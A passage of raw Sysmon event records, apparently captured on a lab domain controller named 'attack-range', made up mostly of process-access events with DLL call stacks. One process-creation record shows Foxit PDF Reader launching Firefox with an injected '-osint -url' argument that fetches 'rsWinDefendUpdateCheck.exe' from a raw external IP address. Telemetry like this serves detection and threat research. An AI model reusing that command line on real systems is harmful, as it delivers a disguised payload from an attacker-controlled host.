Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043338Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.571{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005708C:\Windows\Explorer.EXE{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043337Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.571{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043336Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.571{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043335Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.571{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+1226e|C:\Windows\System32\NPSMDesktopProvider.dll+12835|C:\Windows\System32\NPSMDesktopProvider.dll+67dc|C:\Windows\System32\TwinUI.dll+7bfb8|C:\Windows\System32\TwinUI.dll+7559d|C:\Windows\System32\TwinUI.dll+75173|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043334Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.556{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005436C:\Windows\Explorer.EXE{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043333Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.556{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005436C:\Windows\Explorer.EXE{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043332Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.556{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005436C:\Windows\Explorer.EXE{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043331Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.556{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005436C:\Windows\Explorer.EXE{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043330Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.556{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043329Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.556{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043328Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.556{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043327Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.556{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043326Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.540{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043325Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.540{FE4C2B44-D9F5-63C7-1600-00000000AF02}12963348C:\Windows\system32\svchost.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043324Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.540{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043323Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.524{FE4C2B44-E4A2-63C7-4806-00000000AF02}32405364C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A2-63C7-4706-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\firefox.exe+2096b|C:\Program Files\Mozilla Firefox\firefox.exe+1e523|C:\Program Files\Mozilla Firefox\firefox.exe+2c9f8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043322Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.509{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043321Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.509{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043320Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.509{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043319Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.509{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043318Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.509{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043317Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.509{FE4C2B44-E4A2-63C7-4706-00000000AF02}19361944C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+22349|C:\Program Files\Mozilla Firefox\firefox.exe+1e523|C:\Program Files\Mozilla Firefox\firefox.exe+2c9f8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000043316Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.523{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://45.139.105.143/d/rsWinDefendUpdateCheck.exeC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2MediumMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E4A2-63C7-4706-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://45.139.105.143/d/rsWinDefendUpdateCheck.exe" 10341000x800000000000000043315Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.509{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043314Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.509{FE4C2B44-E4A2-63C7-4706-00000000AF02}19361944C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\firefox.exe+2096b|C:\Program Files\Mozilla Firefox\firefox.exe+1e523|C:\Program Files\Mozilla Firefox\firefox.exe+2c9f8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043313Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.477{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043312Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.477{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043311Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.477{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043310Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.477{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043309Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.477{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E4A2-63C7-4706-00000000AF02}1936C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043308Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:58.477{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-E4A2-63C7-4706-00000000AF02}1936C:\Program Files\Mozilla 